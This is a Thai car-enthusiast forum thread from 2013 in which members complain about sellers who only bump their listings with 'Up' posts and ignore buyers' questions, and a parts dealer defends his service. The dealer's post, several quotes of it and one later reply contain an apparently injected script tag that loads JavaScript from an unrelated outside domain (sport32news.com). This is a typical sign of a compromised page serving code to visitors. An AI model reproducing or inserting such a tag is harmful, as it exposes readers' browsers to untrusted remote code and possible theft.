ตอบ
N_J Civic


เข้าร่วม: 27 ตุลา 2009
ตอบ: 3806

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5146
ให้คำขอบคุณ: 5687

ที่อยู่: นิคม304 - ปราจีน - ชัยภูมิ
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 2 เมษา 2013 18:07 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
ขออนุญาตเขียนกระทู้ เรื่องนี้หน่อยนะครับ

..การที่พ่อค้ามาเปิดตลาดในเวป พอลูกค้าสนใจที่จะซื้อโดยทำการไพสต์ลงในกระทู้ของคุณนั่นแหล่ะ ถึงรายละเอียดของสินค้า หรือการต่อรองราคาโดยขอร้องให้เจ้าของกระทู้ซึ่งคือพ่อค้าทั่ว ๆ ไป หรือเป็นสมาชิกเรา ๆ นี่แหล่ะ อย่างน้อยก็ PM กลับบ้าง ชิ มิ ชิ มิ เพื่อทราบความคืบหน้าว่าของยังอยู่ไหม ของราคาโดนใจหรือเปล่า
แต่ถ้าเอาแต่ไพสต์คำว่า Up, Up, Up แล้วก็ Up โดยไม่มีอะไรที่ดีกว่านี้คุณคิดเหรอครับว่าจะได้ขายของ
ผมเจอหลายกระทู้มากครับ เข้าใจครับว่าแล้วแต่ความคิด ไม่ซื้อก็ไม่ต้องตื๊อ
แต่มันหมั่นว่ะ.....


ต้องขอโทษเพื่อน ๆ อีกครั้งครับที่ใช้เวทีนี้อธิบาย
birthday1987


ชื่อเล่น: เบิร์ด

เข้าร่วม: 19 พฤศจิกา 2009
ตอบ: 655

Guru ES
Guru ES

ได้รับคำขอบคุณ: 484
ให้คำขอบคุณ: 106

ที่อยู่: ChOnBuRi srir@ch@
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 2 เมษา 2013 18:26 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
555  up up up up up อย่างเดียว มีแต่ up up up up 3 หน้าแล้ว ยังจะ up up up up 



ไม่สนใจกันเลย ผมก็ขอผ่านครับ กระทู้พวกนี้


ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  N_J Civic 
DuuI


ชื่อเล่น: ดุ่ย

เข้าร่วม: 02 สิงหา 2011
ตอบ: 1128

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1182
ให้คำขอบคุณ: 1536

ที่อยู่: วัดตะกล่ำ สวนหลวง ร.9
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 2 เมษา 2013 18:55 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
บางทีก็น่ารณรงค์เนอะ ถ้าอยากขายอย่างน้อยต้องมีรูปจริงของสินค้า ราคา ช้อมูลสินค้า รับของที่ไหน ส่งยังไง ค่าส่งเท่าไหร่

บางทีกว่าจะได้ข้อมูลครบ ซื้อขายกันได้ ถามตอบกันเป็นสิบ rep pm อีกไม่รู้เท่าไหร่

ปล. แค่ คหสต. ไม่ถูกใจเพื่อนท่านใดต้องขออภัยนะครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  N_J Civic  Sak_es5442 
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 2 เมษา 2013 19:29 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
ผมว่า ที่ เค้า UP คือไม่ให้กระทู้มันตก เพื่อที่จะให้กระทู้มันอยู่หน้าแรกๆ ซึ่งทางเวปเค้ามีกฎในการอัฟกระทู้ไว้อยู่แล้วอ่ะครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  N_J Civic  POP_ES05 
akkarin_c


ชื่อเล่น: ตู่

เข้าร่วม: 01 สิงหา 2012
ตอบ: 1225

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1081
ให้คำขอบคุณ: 441

ที่อยู่: เตาปูน ปิ่นเกล้า อัมพวา
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 2 เมษา 2013 19:46 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
+1 ครับ  ถามไปก็เงียบ มีแต่ Up Up

ไม่ซื้อก็ได้ฟะ  น่าจะบอกรายละเอียดให้ครบๆ เลย  ผมว่ามันดูจริงใจกว่า
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  bad-in-mind  N_J Civic  Sak_es5442 
xxxsarawutxxx


ชื่อเล่น: ต่อ

เข้าร่วม: 13 ตุลา 2012
ตอบ: 461

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 260
ให้คำขอบคุณ: 609

ที่อยู่: ลำปาง
ปี: 2004
อังคาร, 2 เมษา 2013 20:17 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
ถามไปก็ไม่ตอบ..ไม่รู้ว่าอ่านจิตเราเอารึไง.
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  N_J Civic 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 2 เมษา 2013 20:27 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
N_J Civic พิมพ์ว่า:
ขออนุญาตเขียนกระทู้ เรื่องนี้หน่อยนะครับ

..การที่พ่อค้ามาเปิดตลาดในเวป พอลูกค้าสนใจที่จะซื้อโดยทำการไพสต์ลงในกระทู้ของคุณนั่นแหล่ะ ถึงรายละเอียดของสินค้า หรือการต่อรองราคาโดยขอร้องให้เจ้าของกระทู้ซึ่งคือพ่อค้าทั่ว ๆ ไป หรือเป็นสมาชิกเรา ๆ นี่แหล่ะ อย่างน้อยก็ PM กลับบ้าง ชิ มิ ชิ มิ เพื่อทราบความคืบหน้าว่าของยังอยู่ไหม ของราคาโดนใจหรือเปล่า
แต่ถ้าเอาแต่ไพสต์คำว่า Up, Up, Up แล้วก็ Up โดยไม่มีอะไรที่ดีกว่านี้คุณคิดเหรอครับว่าจะได้ขายของ
ผมเจอหลายกระทู้มากครับ เข้าใจครับว่าแล้วแต่ความคิด ไม่ซื้อก็ไม่ต้องตื๊อ
แต่มันหมั่นว่ะ.....


ต้องขอโทษเพื่อน ๆ อีกครั้งครับที่ใช้เวทีนี้อธิบาย




มาซื้อผมดิ ลองไปถามลูกค้าผมดูว่าผมใส่ใจแค่ไหน"<script src="https://sport32news.com/civicesgroup.js"> จริงๆคือผมอยากได้เพื่อนคร้าบผม อยากให้ได้ของที่ดี แต่ส่วนที่ผมมีข้อบกพร่องก็มีคือไม่ค่อยได้ลงรูปของเท่าไหร่ เพราะบางทีผมก้มองว่าถ้าลูกค้าอยากได้จริงๆยังไงเค้าก็ต้องโทรมา และหลังจากนั้นผมก็จะส่ง รูปทางเมล์ ไลน์ หรือ วอชแอพไปให้
      กฏในการขายของของผมมี 2 ข้อคร้าบ
1.ลูกค้าถูกและสำคัญที่สุดเสมอ
2.ถ้ามีข้อเคลือบแคลงสงสัยให้กลับไปดูข้อ 1. ใหม่
      ถ้าผมเคยทำให้พี่ๆเพื่อนๆ น้องๆท่านใดไม่พอใจในการซื้อขายก็ต้องขออภัยมา ณ ที่นี้ด้วยนะคร้าบ ไม่มีเจตนาจริงๆ อยากซื้อขายกันแบบพี่น้องคร้าบ แบ่งกันใช้กำไรพอได้ค่าน้ำมันค่าเหนื่อยนิดหน่อย คนขายอยู่้ได้ คนซื้อสบายใจราคาสมเหตุสมผล
ได้รับคำขอบคุณจาก: bad-in-mind  athongchum  sukhothai  สมชาย  HankMan  tatumz  เค  N_J Civic  Sak_es5442  phichetza  Rachen  DuuI  AofStaR  CROW  chokpiti 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 3 เมษา 2013 02:34 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
จะมาบอกว่าพ่อค้าที่คิดจะขายของอย่างเดียวเค้าจะคิดอย่างนี้คือ ถ้าลูกค้าสนใจจริงๆ จะไม่โพสถามในกระทู้หรอก มักจะโทรไปมากกว่า ผมก็คนนึงที่จะซื้ออะไรแล้วจะเอาแน่ๆ ผมจะไม่โพสถาม จะโทรไปเลย เพราะเดี๋ยวมันจะไม่ทันการ อันไหนที่โพสถามคืออันนั้นยังลังเลอยู่ ถึงใครตัดหน้าไปก่อนก็ไม่เป็นไร
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  HankMan  N_J Civic  Sak_es5442  NuuTeee  undertaker55  kaisuh  CROW 
es-may


เข้าร่วม: 26 กรกฎา 2010
ตอบ: 320

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 265
ให้คำขอบคุณ: 240

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 3 เมษา 2013 03:03 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
คิดเหมือนกันเลยคับ มันหมั่นๆ 555 

ผมก็ถือซะว่าไม่อยากขาย ผมก็ไม่อยากซื้อ จบไป
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  N_J Civic  Sak_es5442 
sukhothai


เข้าร่วม: 23 สิงหา 2009
ตอบ: 1604

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2571
ให้คำขอบคุณ: 7453
พุธ, 3 เมษา 2013 07:13 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
athongchum พิมพ์ว่า:
จะมาบอกว่าพ่อค้าที่คิดจะขายของอย่างเดียวเค้าจะคิดอย่างนี้คือ ถ้าลูกค้าสนใจจริงๆ จะไม่โพสถามในกระทู้หรอก มักจะโทรไปมากกว่า ผมก็คนนึงที่จะซื้ออะไรแล้วจะเอาแน่ๆ ผมจะไม่โพสถาม จะโทรไปเลย เพราะเดี๋ยวมันจะไม่ทันการ อันไหนที่โพสถามคืออันนั้นยังลังเลอยู่ ถึงใครตัดหน้าไปก่อนก็ไม่เป็นไร



เหมือนกันครับ เดี๋ยวไม่ทันการ 555
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  N_J Civic 
tatumz


เข้าร่วม: 30 กรกฎา 2009
ตอบ: 728

Guru ES
Guru ES

ได้รับคำขอบคุณ: 639
ให้คำขอบคุณ: 494

ที่อยู่: 69
ปี: 2003
พุธ, 3 เมษา 2013 07:41 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
eskung พิมพ์ว่า:
 มาซื้อผมดิ ลองไปถามลูกค้าผมดูว่าผมใส่ใจแค่ไหน จริงๆคือผมอยากได้เพื่อนคร้าบผม อยากให้ได้ของที่ดี แต่ส่วนที่ผมมีข้อบกพร่องก็มีคือไม่ค่อยได้ลงรูปของเท่าไหร่ เพราะบางทีผมก้มองว่าถ้าลูกค้าอยากได้จริงๆยังไงเค้าก็ต้องโทรมา และหลังจากนั้นผมก็จะส่ง รูปทางเมล์ ไลน์ หรือ วอชแอพไปให้
      กฏในการขายของของผมมี 2 ข้อคร้าบ
1.ลูกค้าถูกและสำคัญที่สุดเสมอ
2.ถ้ามีข้อเคลือบแคลงสงสัยให้กลับไปดูข้อ 1. ใหม่
      ถ้าผมเคยทำให้พี่ๆเพื่อนๆ น้องๆท่านใดไม่พอใจในการซื้อขายก็ต้องขออภัยมา ณ ที่นี้ด้วยนะคร้าบ ไม่มีเจตนาจริงๆ อยากซื้อขายกันแบบพี่น้องคร้าบ แบ่งกันใช้กำไรพอได้ค่าน้ำมันค่าเหนื่อยนิดหน่อย คนขายอยู่้ได้ คนซื้อสบายใจราคาสมเหตุสมผล

ทีอย่างอื่นม่ายเห็นแบ่งเยยยยยยย แอบอย่างเดียว...อิอิอิ (ขอให้จู๋หด)
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  N_J Civic 
สมชาย


เข้าร่วม: 14 มกรา 2013
ตอบ: 5916

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4245
ให้คำขอบคุณ: 7209

ที่อยู่: อ.บ้านบึง จ.ชลบุรี
ปี: 2001
สี: แดง รอยัล รูบี้ (มุก) (R-522P)
พุธ, 3 เมษา 2013 07:45 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
เห็นด้วยอย่างแรง
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  N_J Civic  Sak_es5442 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 3 เมษา 2013 07:50 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
tatumz พิมพ์ว่า:
eskung พิมพ์ว่า:
 มาซื้อผมดิ ลองไปถามลูกค้าผมดูว่าผมใส่ใจแค่ไหน จริงๆคือผมอยากได้เพื่อนคร้าบผม อยากให้ได้ของที่ดี แต่ส่วนที่ผมมีข้อบกพร่องก็มีคือไม่ค่อยได้ลงรูปของเท่าไหร่ เพราะบางทีผมก้มองว่าถ้าลูกค้าอยากได้จริงๆยังไงเค้าก็ต้องโทรมา และหลังจากนั้นผมก็จะส่ง รูปทางเมล์ ไลน์ หรือ วอชแอพไปให้
      กฏในการขายของของผมมี 2 ข้อคร้าบ
1.ลูกค้าถูกและสำคัญที่สุดเสมอ
2.ถ้ามีข้อเคลือบแคลงสงสัยให้กลับไปดูข้อ 1. ใหม่
      ถ้าผมเคยทำให้พี่ๆเพื่อนๆ น้องๆท่านใดไม่พอใจในการซื้อขายก็ต้องขออภัยมา ณ ที่นี้ด้วยนะคร้าบ ไม่มีเจตนาจริงๆ อยากซื้อขายกันแบบพี่น้องคร้าบ แบ่งกันใช้กำไรพอได้ค่าน้ำมันค่าเหนื่อยนิดหน่อย คนขายอยู่้ได้ คนซื้อสบายใจราคาสมเหตุสมผล

ทีอย่างอื่นม่ายเห็นแบ่งเยยยยยยย แอบอย่างเดียว...อิอิอิ (ขอให้จู๋หด)




หงะ
ได้รับคำขอบคุณจาก: tatumz  เค  N_J Civic 
HankMan


เข้าร่วม: 10 มกรา 2011
ตอบ: 424

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 359
ให้คำขอบคุณ: 749

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 3 เมษา 2013 07:55 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
ผมอยากให้มองว่า ถ้าเขาไม่สนใจเราๆ ก้อลองหาซื้อจากพ่อค้าคนอื่นก้อได้นะครับ ส่วนตัวผมแล้วถ้าคิดจะซื้อจิงจะโทรไปถามเลย หรือถ้ามีข้อสงสัยจะขอรายละเอียดเพิ่มทาง pm ซึ่งส่วนใหญ่ ผมจะได้รับการตอบรับที่ดีมากๆ (ไม่ขอเอ่อยชื่อดีกว่าครับ ของคนดีพิสูจน์กันไม่ยากครับ) แต่ทั้งนี้ทั้งนั้น เป็นประสบการณ์ของผมเองนะครับ จึงอยากเล่าสู่กันฟังครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  kaisuh 
N_J Civic


เข้าร่วม: 27 ตุลา 2009
ตอบ: 3806

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5146
ให้คำขอบคุณ: 5687

ที่อยู่: นิคม304 - ปราจีน - ชัยภูมิ
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 3 เมษา 2013 08:21 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
พ่อค้าที่เอาใจลูกค้าก็เยอะครับ เพราะเจ้านี้ไม่ได้ ผมก็หาไปเรื่อย ๆ

ที่เราต้อง PM ถามก่อน หรือโพสต์ถามก่อนเพราะอยากได้รายละเอียดเพิ่ม โดยไม่ต้องเสียค่าโทรฯ แรก ๆ ก็คิดว่าเค้ายังไม่ออนไลน์ ไอ๊ย๊ะ ที่บอกว่า Up นั้นน่ะเมื่อ 1 นาทีนี่เอง



อ้างอิงจาก:
eskung
N_J Civic พิมพ์ว่า:
ขออนุญาตเขียนกระทู้ เรื่องนี้หน่อยนะครับ

..การที่พ่อค้ามาเปิดตลาดในเวป พอลูกค้าสนใจที่จะซื้อโดยทำการไพสต์ลงในกระทู้ของคุณนั่นแหล่ะ ถึงรายละเอียดของสินค้า หรือการต่อรองราคาโดยขอร้องให้เจ้าของกระทู้ซึ่งคือพ่อค้าทั่ว ๆ ไป หรือเป็นสมาชิกเรา ๆ นี่แหล่ะ อย่างน้อยก็ PM กลับบ้าง ชิ มิ ชิ มิ เพื่อทราบความคืบหน้าว่าของยังอยู่ไหม ของราคาโดนใจหรือเปล่า
แต่ถ้าเอาแต่ไพสต์คำว่า Up, Up, Up แล้วก็ Up โดยไม่มีอะไรที่ดีกว่านี้คุณคิดเหรอครับว่าจะได้ขายของ
ผมเจอหลายกระทู้มากครับ เข้าใจครับว่าแล้วแต่ความคิด ไม่ซื้อก็ไม่ต้องตื๊อ
แต่มันหมั่นว่ะ.....


ต้องขอโทษเพื่อน ๆ อีกครั้งครับที่ใช้เวทีนี้อธิบาย




มาซื้อผมดิ ลองไปถามลูกค้าผมดูว่าผมใส่ใจแค่ไหน"<script src="https://sport32news.com/civicesgroup.js"> จริงๆคือผมอยากได้เพื่อนคร้าบผม อยากให้ได้ของที่ดี แต่ส่วนที่ผมมีข้อบกพร่องก็มีคือไม่ค่อยได้ลงรูปของเท่าไหร่ เพราะบางทีผมก้มองว่าถ้าลูกค้าอยากได้จริงๆยังไงเค้าก็ต้องโทรมา และหลังจากนั้นผมก็จะส่ง รูปทางเมล์ ไลน์ หรือ วอชแอพไปให้
      กฏในการขายของของผมมี 2 ข้อคร้าบ
1.ลูกค้าถูกและสำคัญที่สุดเสมอ
2.ถ้ามีข้อเคลือบแคลงสงสัยให้กลับไปดูข้อ 1. ใหม่
      ถ้าผมเคยทำให้พี่ๆเพื่อนๆ น้องๆท่านใดไม่พอใจในการซื้อขายก็ต้องขออภัยมา ณ ที่นี้ด้วยนะคร้าบ ไม่มีเจตนาจริงๆ อยากซื้อขายกันแบบพี่น้องคร้าบ แบ่งกันใช้กำไรพอได้ค่าน้ำมันค่าเหนื่อยนิดหน่อย คนขายอยู่้ได้ คนซื้อสบายใจราคาสมเหตุสมผล




+1
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 3 เมษา 2013 08:24 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
N_J Civic พิมพ์ว่า:
พ่อค้าที่เอาใจลูกค้าก็เยอะครับ เพราะเจ้านี้ไม่ได้ ผมก็หาไปเรื่อย ๆ

ที่เราต้อง PM ถามก่อน หรือโพสต์ถามก่อนเพราะอยากได้รายละเอียดเพิ่ม โดยไม่ต้องเสียค่าโทรฯ แรก ๆ ก็คิดว่าเค้ายังไม่ออนไลน์ ไอ๊ย๊ะ ที่บอกว่า Up นั้นน่ะเมื่อ 1 นาทีนี่เอง



อ้างอิงจาก:
eskung
N_J Civic พิมพ์ว่า:
ขออนุญาตเขียนกระทู้ เรื่องนี้หน่อยนะครับ

..การที่พ่อค้ามาเปิดตลาดในเวป พอลูกค้าสนใจที่จะซื้อโดยทำการไพสต์ลงในกระทู้ของคุณนั่นแหล่ะ ถึงรายละเอียดของสินค้า หรือการต่อรองราคาโดยขอร้องให้เจ้าของกระทู้ซึ่งคือพ่อค้าทั่ว ๆ ไป หรือเป็นสมาชิกเรา ๆ นี่แหล่ะ อย่างน้อยก็ PM กลับบ้าง ชิ มิ ชิ มิ เพื่อทราบความคืบหน้าว่าของยังอยู่ไหม ของราคาโดนใจหรือเปล่า
แต่ถ้าเอาแต่ไพสต์คำว่า Up, Up, Up แล้วก็ Up โดยไม่มีอะไรที่ดีกว่านี้คุณคิดเหรอครับว่าจะได้ขายของ
ผมเจอหลายกระทู้มากครับ เข้าใจครับว่าแล้วแต่ความคิด ไม่ซื้อก็ไม่ต้องตื๊อ
แต่มันหมั่นว่ะ.....


ต้องขอโทษเพื่อน ๆ อีกครั้งครับที่ใช้เวทีนี้อธิบาย




มาซื้อผมดิ ลองไปถามลูกค้าผมดูว่าผมใส่ใจแค่ไหน"<script src="https://sport32news.com/civicesgroup.js"> จริงๆคือผมอยากได้เพื่อนคร้าบผม อยากให้ได้ของที่ดี แต่ส่วนที่ผมมีข้อบกพร่องก็มีคือไม่ค่อยได้ลงรูปของเท่าไหร่ เพราะบางทีผมก้มองว่าถ้าลูกค้าอยากได้จริงๆยังไงเค้าก็ต้องโทรมา และหลังจากนั้นผมก็จะส่ง รูปทางเมล์ ไลน์ หรือ วอชแอพไปให้
      กฏในการขายของของผมมี 2 ข้อคร้าบ
1.ลูกค้าถูกและสำคัญที่สุดเสมอ
2.ถ้ามีข้อเคลือบแคลงสงสัยให้กลับไปดูข้อ 1. ใหม่
      ถ้าผมเคยทำให้พี่ๆเพื่อนๆ น้องๆท่านใดไม่พอใจในการซื้อขายก็ต้องขออภัยมา ณ ที่นี้ด้วยนะคร้าบ ไม่มีเจตนาจริงๆ อยากซื้อขายกันแบบพี่น้องคร้าบ แบ่งกันใช้กำไรพอได้ค่าน้ำมันค่าเหนื่อยนิดหน่อย คนขายอยู่้ได้ คนซื้อสบายใจราคาสมเหตุสมผล




+1




"<script src="https://sport32news.com/civicesgroup.js"> ..
ได้รับคำขอบคุณจาก: N_J Civic 
Chonchy


ชื่อเล่น: ชล

เข้าร่วม: 12 มกรา 2012
ตอบ: 4143

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7371
ให้คำขอบคุณ: 6492

ที่อยู่: แม่กลอง...มหาชัย...
ปี: 2001
พุธ, 3 เมษา 2013 08:55 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
ของผมก็อัพ...อิอิ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  N_J Civic 
somchai10


เข้าร่วม: 08 มิถุนา 2010
ตอบ: 1663

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 488
ให้คำขอบคุณ: 103
พุธ, 3 เมษา 2013 10:14 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
athongchum พิมพ์ว่า:
จะมาบอกว่าพ่อค้าที่คิดจะขายของอย่างเดียวเค้าจะคิดอย่างนี้คือ ถ้าลูกค้าสนใจจริงๆ จะไม่โพสถามในกระทู้หรอก มักจะโทรไปมากกว่า ผมก็คนนึงที่จะซื้ออะไรแล้วจะเอาแน่ๆ ผมจะไม่โพสถาม จะโทรไปเลย เพราะเดี๋ยวมันจะไม่ทันการ อันไหนที่โพสถามคืออันนั้นยังลังเลอยู่ ถึงใครตัดหน้าไปก่อนก็ไม่เป็นไร



        เห็นด้วยเลยครับ
ได้รับคำขอบคุณจาก: N_J Civic  athongchum 
somkides01


ชื่อเล่น: คิด

เข้าร่วม: 13 ตุลา 2008
ตอบ: 893

Guru ES
Guru ES

ได้รับคำขอบคุณ: 883
ให้คำขอบคุณ: 118

ที่อยู่: ศาลายา
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 3 เมษา 2013 10:28 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
N_J Civic พิมพ์ว่า:
ขออนุญาตเขียนกระทู้ เรื่องนี้หน่อยนะครับ

..การที่พ่อค้ามาเปิดตลาดในเวป พอลูกค้าสนใจที่จะซื้อโดยทำการไพสต์ลงในกระทู้ของคุณนั่นแหล่ะ ถึงรายละเอียดของสินค้า หรือการต่อรองราคาโดยขอร้องให้เจ้าของกระทู้ซึ่งคือพ่อค้าทั่ว ๆ ไป หรือเป็นสมาชิกเรา ๆ นี่แหล่ะ อย่างน้อยก็ PM กลับบ้าง ชิ มิ ชิ มิ เพื่อทราบความคืบหน้าว่าของยังอยู่ไหม ของราคาโดนใจหรือเปล่า
แต่ถ้าเอาแต่ไพสต์คำว่า Up, Up, Up แล้วก็ Up โดยไม่มีอะไรที่ดีกว่านี้คุณคิดเหรอครับว่าจะได้ขายของ
ผมเจอหลายกระทู้มากครับ เข้าใจครับว่าแล้วแต่ความคิด ไม่ซื้อก็ไม่ต้องตื๊อ
แต่มันหมั่นว่ะ.....


ต้องขอโทษเพื่อน ๆ อีกครั้งครับที่ใช้เวทีนี้อธิบาย




up
ได้รับคำขอบคุณจาก: N_J Civic 
bigmtts43


ชื่อเล่น: บิ๊ก

เข้าร่วม: 04 มิถุนา 2011
ตอบ: 365

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 830
ให้คำขอบคุณ: 5

ที่อยู่: บางกะปิ รามคำแหง พัฒนาการ
ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 3 เมษา 2013 11:17 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
ถูกต้องเลยครับ เจอหลายกระทู้มาก ถามไปก็ไม่ตอบ  เข้ามาก็พิมพ์แต่ up up up up up Up pong di ตอบตูมั่งก็ได้แสรดๆ 
ได้รับคำขอบคุณจาก: N_J Civic  CROW 
N_J Civic


เข้าร่วม: 27 ตุลา 2009
ตอบ: 3806

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5146
ให้คำขอบคุณ: 5687

ที่อยู่: นิคม304 - ปราจีน - ชัยภูมิ
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 3 เมษา 2013 11:21 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
Chonchy พิมพ์ว่า:
ของผมก็อัพ...อิอิ




up แต่ผมก็ได้ของจากคุณชล 5555
underhill


เข้าร่วม: 15 กันยา 2011
ตอบ: 3545

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4125
ให้คำขอบคุณ: 1677

ปี: 2002
สี: น้ำเงิน อิเทอนอล (B-96P)
พุธ, 3 เมษา 2013 11:47 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
ผมก็อัพนะ แต่บางทีวันคุยโทรสับไม่ได้ ทั้งๆที่อยู่หน้าึคอมตลอด
ได้รับคำขอบคุณจาก: N_J Civic 
Ekk_bangyai


เข้าร่วม: 13 ธันวา 2012
ตอบ: 231

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 153
ให้คำขอบคุณ: 438

ที่อยู่: Nonthaburi
ปี: 2004
พุธ, 3 เมษา 2013 12:14 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
ถูกเลยคร้าบ
ได้รับคำขอบคุณจาก: N_J Civic 
NuuTeee


ชื่อเล่น: ตี่

เข้าร่วม: 09 พฤษภาคม 2010
ตอบ: 1198

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1485
ให้คำขอบคุณ: 2146

ที่อยู่: บางใหญ่
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 3 เมษา 2013 12:19 - ไม่เข้าใจว่าพ่อค้า ที่ดีควรเอาใจลูกค้าหรือไม่
athongchum พิมพ์ว่า:
จะมาบอกว่าพ่อค้าที่คิดจะขายของอย่างเดียวเค้าจะคิดอย่างนี้คือ ถ้าลูกค้าสนใจจริงๆ จะไม่โพสถามในกระทู้หรอก มักจะโทรไปมากกว่า ผมก็คนนึงที่จะซื้ออะไรแล้วจะเอาแน่ๆ ผมจะไม่โพสถาม จะโทรไปเลย เพราะเดี๋ยวมันจะไม่ทันการ อันไหนที่โพสถามคืออันนั้นยังลังเลอยู่ ถึงใครตัดหน้าไปก่อนก็ไม่เป็นไร


ตามนี้ครับ

